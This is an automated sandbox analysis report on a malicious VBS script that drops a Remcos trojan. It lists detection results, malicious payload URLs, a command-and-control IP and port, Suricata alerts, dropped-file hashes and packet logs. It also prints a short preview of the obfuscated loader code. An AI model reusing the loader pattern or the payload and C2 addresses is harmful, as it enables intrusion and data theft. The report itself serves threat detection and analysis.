DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
scan_doc20241024.vbs	18%	Virustotal		Browse
scan_doc20241024.vbs	16%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723	true		unknown
https://raw.githubusercontent.com/IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	RegAsm.exe	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com	powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://geoplugin.net/json.gp/C	powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417	powershell.exe, 00000002.00000002.1731133022.000001ECDB2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE273000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420078473.000001CFCE454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420192137.000001CFCFD00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD4285000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://go.micro	powershell.exe, 00000006.00000002.1420244282.000001CFD5785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 00000006.00000002.1420244282.000001CFD540A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD53E4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.1731133022.000001ECDAD8D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1731133022.000001ECDADDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1731133022.000001ECDAE0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.108.133	unknown	Netherlands		54113	FASTLYUS	true
154.216.18.51	unknown	Seychelles		135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1540845
Start date and time:	2024-10-24 08:45:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	scan_doc20241024.vbs
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.winVBS@8/7@0/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 26 Number of non-executed functions: 152
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, raw.githubusercontent.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:46:54	API Interceptor	46x Sleep call for process: powershell.exe modified
04:36:54	API Interceptor	1264616x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.108.133	cr_asm.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gaber.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.102
	mips.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.102
	x86.elf	Get hash	malicious	Okiru	Browse	154.216.19.102
	fqF93rYI4Y.exe	Get hash	malicious	XWorm	Browse	154.216.18.238
	POX455U90897QD.exe	Get hash	malicious	XWorm	Browse	154.216.18.238
	l6G93s9XLN.elf	Get hash	malicious	Mirai	Browse	156.241.11.56
	Salary Revision_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	154.216.18.214
	Order.vbs	Get hash	malicious	Remcos	Browse	154.216.17.141
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.17.159
	bot.mips.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
FASTLYUS	FedEx Shipping Document_pdf.html	Get hash	malicious	Unknown	Browse	199.232.196.193
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	RTGS_UCB_DCCB_docx.html	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	http://jedox-couriers.com/5g/domain.php/domain..html?#infoland@hdel.co.kr	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.199.108.133
	FedEx Shipping Document_pdf.html	Get hash	malicious	Unknown	Browse	185.199.108.133
	Urgent Quotation documents One Pdf.vbs	Get hash	malicious	AgentTesla	Browse	185.199.108.133
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	185.199.108.133
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.199.108.133
	Douglas County Government.pdf	Get hash	malicious	HtmlDropper	Browse	185.199.108.133
	https://t.ly/2jKWO	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	185.199.108.133
	http://molatoriism.icu	Get hash	malicious	HTMLPhisher	Browse	185.199.108.133
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse	185.199.108.133
	https://dca13.z4.web.core.windows.net/werrx01USAHTML/?bcda=1-877-883-8072#	Get hash	malicious	TechSupportScam	Browse	185.199.108.133

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulx51ll/h:NllU
MD5:	4293FEE5C8B10DA4F196BB8D3E9677AB
SHA1:	24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
SHA-256:	95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
SHA-512:	262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
Malicious:	false
Reputation:	low
Preview:	@...e................................. ..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pevfhq3.qkz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blz4h04t.10f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4r4efso.me3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkq234rg.kxd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiqzd4rg.3ij.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vevgtv1i.ia0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:
Entropy (8bit):	5.42771490814887
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	scan_doc20241024.vbs
File size:	15'883 bytes
MD5:	87e9c9fa5b677d82e0eba303bfee0768
SHA1:	26c03786558062484c7f275afedea681494c8b7f
SHA256:	af2848711b8c1b41a6315cd18c52158f1c080f462c3d100df9670f5df265daf0
SHA512:	9c0cb9d368993d5d79d0b6b1fdb492c2c4bea2d1f5cf8e3ba8b36ca2bde590009de67c99e514ba2007c2a1364da3903ba9387866483d8c8c49c7b0bb50082e30
SSDEEP:	384:ZFbb3MURKUPfZwuuIz0Y2LPJmxNSiMFpWjufVe:ZhrMUR5uIQY2VW2w
TLSH:	3C628646F3261FF01E2F43698C02F586476217787D35BA8E24FE94CC18B729ACDA46D9
File Content Preview:	'g..AkfmAfkfhad = rRegisggfgterteadkggns2211 & ""..Call Ugsfisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0")..Call Ugsfisging("#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#")..ajjiSpmfm = "" & LenB("ihmagnf

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T08:46:47.756446+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49983	154.216.18.51	2404	TCP
2024-10-24T08:46:59.611668+0200	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	185.199.108.133	443	192.168.2.7	49699	TCP
2024-10-24T08:47:03.551417+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49701	185.199.108.133	443	TCP
2024-10-24T08:47:03.786188+0200	2020423	ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound	1	185.199.108.133	443	192.168.2.7	49701	TCP
2024-10-24T08:47:03.786188+0200	2020425	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1	1	185.199.108.133	443	192.168.2.7	49701	TCP
2024-10-24T08:47:13.088279+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49712	154.216.18.51	2404	TCP
2024-10-24T08:47:22.602331+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49761	154.216.18.51	2404	TCP
2024-10-24T08:47:32.217285+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49810	154.216.18.51	2404	TCP
2024-10-24T08:47:41.706178+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49859	154.216.18.51	2404	TCP
2024-10-24T08:47:51.205328+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49905	154.216.18.51	2404	TCP
2024-10-24T08:48:00.693845+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49958	154.216.18.51	2404	TCP
2024-10-24T08:48:10.219010+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49977	154.216.18.51	2404	TCP
2024-10-24T08:48:19.893680+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49978	154.216.18.51	2404	TCP
2024-10-24T08:48:29.661701+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49979	154.216.18.51	2404	TCP
2024-10-24T08:48:39.444682+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49980	154.216.18.51	2404	TCP
2024-10-24T08:48:48.963788+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49981	154.216.18.51	2404	TCP
2024-10-24T08:48:58.457696+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49982	154.216.18.51	2404	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 08:46:56.222501040 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:56.222528934 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:56.222645044 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:56.234818935 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:56.234837055 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:56.861426115 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:56.861510038 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:56.865343094 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:56.865353107 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:56.865748882 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:56.876935959 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:56.923338890 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.348918915 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.397015095 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.465125084 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.465141058 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.465174913 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.465187073 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.465204954 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.465221882 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.465243101 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.465281010 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.465336084 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.467094898 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.467120886 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.467207909 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.467221975 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.467272043 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.583789110 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.583813906 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.583872080 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.583887100 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.583923101 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.584048033 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.585798025 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.585813999 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.585905075 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.585911989 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.586049080 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.586939096 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.586958885 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.586997032 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.587002039 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.587039948 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.587340117 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.626033068 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.626055956 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.626111031 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.626132011 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.626158953 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.626254082 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.703275919 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.703310013 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.703383923 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.703402996 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.703435898 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.703435898 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.703845024 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.703890085 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.703923941 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.703929901 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.703986883 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.703986883 CEST	49699	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:46:57.705466032 CEST	443	49699	185.199.108.133	192.168.2.7
Oct 24, 2024 08:46:57.705496073 CEST	443	49699	185.199.108.133	192.168.2.7
